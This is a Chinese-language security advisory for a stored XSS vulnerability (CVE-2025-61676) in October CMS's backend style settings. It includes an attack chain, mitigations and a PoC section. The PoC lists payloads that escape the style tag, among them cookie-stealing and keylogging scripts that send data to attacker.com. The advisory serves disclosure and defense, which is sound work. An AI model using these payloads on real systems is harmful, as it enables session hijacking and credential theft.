CVE-2025-61676 October CMS 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-61676

漏洞类型

存储型XSS

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

October CMS

漏洞概述

CVE-2025-61676是October CMS中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响3.7.13之前的3.x版本和4.0.12之前的4.x版本。攻击者需要拥有"Customize Backend Styles"（自定义后端样式）权限，可以在"Branding & Appearance"设置页面的样式表输入框中注入恶意HTML/JavaScript代码。攻击者精心构造的输入可以突破预期的<style>标签上下文限制，导致代码在所有后端页面用户访问时执行，造成持久性的跨站脚本攻击。由于该漏洞为存储型，恶意脚本会永久保存在服务器端，所有访问受影响页面的用户都会受到威胁，可能导致会话劫持、凭据窃取、恶意操作执行等严重后果。

技术细节

该漏洞存在于October CMS后端的样式定制功能中。系统在处理用户输入的CSS样式时，未对输入内容进行充分的过滤和转义。攻击者利用<style>标签的解析特性，通过精心构造的输入序列（如</style><script>alert(1)</script>）可以突破<style>标签的包裹，将任意HTML/JavaScript代码注入到页面中。由于该输入会永久存储在数据库中，当其他用户访问后端页面时，恶意脚本会在其浏览器上下文中执行。攻击者利用此漏洞可以窃取用户的会话cookie、模拟用户操作、修改页面内容或进行进一步的攻击。漏洞的利用需要攻击者具有较高的权限（Customize Backend Styles权限），但一旦成功，攻击影响范围覆盖所有后端用户。

攻击链分析

STEP 1

步骤1

攻击者获取October CMS后端账户，并确认拥有'Customize Backend Styles'权限

STEP 2

步骤2

攻击者登录后端，导航至'Settings' > 'Branding & Appearance'或'Customize Backend Styles'设置页面

STEP 3

步骤3

在样式表输入框中注入精心构造的XSS payload，如'</style><script>alert(1)</script><style>'，利用该payload突破</style>标签限制

STEP 4

步骤4

保存设置，恶意代码被永久存储在数据库中（存储型XSS特性）

STEP 5

步骤5

其他后端用户访问任何后端页面时，恶意脚本在其浏览器上下文中执行

STEP 6

步骤6

攻击者通过恶意脚本窃取用户会话cookie、凭据或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-61676 PoC - October CMS Stored XSS in Backend Styles
// Attacker requires 'Customize Backend Styles' permission

// Step 1: Navigate to Branding & Appearance settings
// Settings > Customize Backend Styles or Branding & Appearance

// Step 2: Inject malicious code in Styles textarea
// Payload to escape </style> tag and inject script:
payload = '</style><script>alert(document.cookie)</script><style>'

// Step 3: Save the settings
// The malicious script will be stored and executed for all backend users

// Alternative payloads:
// 1. Session hijacking:
alt_payload1 = '</style><img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)><style>'

// 2. Keylogging:
alt_payload2 = '</style><script>document.addEventListener("keypress",e=>fetch("https://attacker.com/log?k="+e.key))</script><style>'

// 3. DOM manipulation:
alt_payload3 = '</style><script>document.body.innerHTML="<h1>Pwned</h1>"</script><style>'

影响范围

October CMS 3.x < 3.7.13

October CMS 4.x < 4.0.12

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 审查并限制拥有'Customize Backend Styles'权限的用户账户，仅授予绝对必要的用户；2) 实施严格的输入验证规则，禁止在样式输入中使用<script>标签和HTML标签；3) 配置严格的Content-Security-Policy响应头防止脚本执行；4) 监控后端访问日志，检测异常的样式设置修改行为；5) 考虑临时禁用样式自定义功能直至完成安全更新。